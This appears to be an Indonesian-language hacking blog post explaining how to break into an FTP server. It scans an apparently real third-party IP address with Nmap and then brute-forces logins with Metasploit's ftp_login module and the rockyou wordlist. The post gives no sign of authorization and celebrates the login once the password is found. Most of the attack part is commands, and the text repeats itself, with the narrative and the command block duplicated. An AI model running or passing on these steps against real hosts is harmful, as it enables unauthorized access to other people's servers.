How to attack FTP service
FTP atau File Transfer Protocol adalah satu layanan umum di gunakan sebuah server dari webmaster, dan hampir tidak mungkin menemukan layanan ini di sebuah webserver.
Equipments:
1. Nmap
2. Metasploit
hal yang pertama kita lakukan adalah mencari target, dan disini yang menjadi target saya adalah : 36.86.XX.XX
selanjutnya kita menggunakan Nmap untuk melihat port apa saja yg dimiliki ip tersebut. dan disini port yang kita butuhkan adalah : 21
terlihat diatas port yang kita butuhkan terbuka =))
selanjutnya saya mencoba login dengan username: admin dan password: admin
upss, ternyata salah =))
selanjutnya mari kita gunakan Metasploit =))
RHOSTS = Target range ip-address
PASS_FILE = password list
USER_FILE = username list
Enter
yuhuuu, kita berhasil menemukan password =))
selanjutnya mari kita coba login ulang
Done =))
Regards
Hidemichi-Hiroyuki a.k.a [H2]
Equipments:
1. Nmap
2. Metasploit
hal yang pertama kita lakukan adalah mencari target, dan disini yang menjadi target saya adalah : 36.86.XX.XX
selanjutnya kita menggunakan Nmap untuk melihat port apa saja yg dimiliki ip tersebut. dan disini port yang kita butuhkan adalah : 21
# nmap -A -v 36.86.XX.XX
terlihat diatas port yang kita butuhkan terbuka =))
selanjutnya saya mencoba login dengan username: admin dan password: admin
upss, ternyata salah =))
selanjutnya mari kita gunakan Metasploit =))
# msfconsole
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS 36.86.23.39
RHOSTS => 36.86.23.39
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf auxiliary(ftp_login) > set USER_FILE /usr/share/wordlists/user_list.txt
USER_FILE => /usr/share/wordlists/user_list.txt
msf auxiliary(ftp_login) > run
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS 36.86.23.39
RHOSTS => 36.86.23.39
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf auxiliary(ftp_login) > set USER_FILE /usr/share/wordlists/user_list.txt
USER_FILE => /usr/share/wordlists/user_list.txt
msf auxiliary(ftp_login) > run
RHOSTS = Target range ip-address
PASS_FILE = password list
USER_FILE = username list
Enter
yuhuuu, kita berhasil menemukan password =))
selanjutnya mari kita coba login ulang
Done =))
Regards
Hidemichi-Hiroyuki a.k.a [H2]
Comments
Post a Comment
Do Not Fuckin Spamming